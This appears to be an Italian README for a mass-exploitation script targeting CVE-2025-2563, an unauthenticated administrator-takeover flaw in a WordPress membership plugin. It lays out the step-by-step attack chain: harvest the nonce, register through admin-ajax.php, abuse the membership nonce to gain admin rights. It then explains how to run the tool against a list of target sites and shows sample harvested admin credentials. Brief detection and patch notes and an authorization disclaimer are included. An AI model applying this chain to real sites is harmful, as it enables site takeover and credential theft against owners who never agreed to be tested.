
CVE-2025-2563
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — Escalation dei Privilegi Non Autenticata tramite il plugin User Registration & Membership per WordPress. Exploit a catena completa: registrazione anonima → abuso del nonce di membership → acquisizione del ruolo amministratore.
| Campo | Dettaglio |
|---|---|
| CVE | CVE-2025-2563 |
| Plugin | User Registration & Membership |
| Versione Affetta | ≤ 4.1.1 |
| Tipo | Escalation dei Privilegi Non Autenticata |
| CVSS | Critico |
| Vettore | Rete / Nessuna autenticazione richiesta |
| WordPress | Qualsiasi versione con il plugin installato |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
form_id × membership_id × noncewp-admin prima di segnare come successoNATA_admin.txt, registrazioni in reg.txtpip install requests rich
# 1. Aggiungi i target a list.txt (un URL per riga)
# 2. Esegui
python CVE-2025-2563.py
Input: list.txt
https://target1.com
https://target2.com
https://target3.com
Output: NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| File | Contenuto |
|---|---|
NATA_admin.txt | Credenziali admin confermate |
reg.txt | Tutte le registrazioni riuscite |
Monitorare:
/wp-admin/admin-ajax.php con action=user_registration_user_form_submit/membership-registration/ seguite immediatamente da assegnazione AJAX di membershipPatch: Aggiornare il plugin User Registration & Membership alla versione >= 4.1.2
Questo strumento è rilasciato esclusivamente per test di penetrazione autorizzati e ricerca sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio. Ottenere sempre un'autorizzazione scritta esplicita prima di testare.
Natan Utama — github.com/dokter69 | Telegram: @ayasyanaro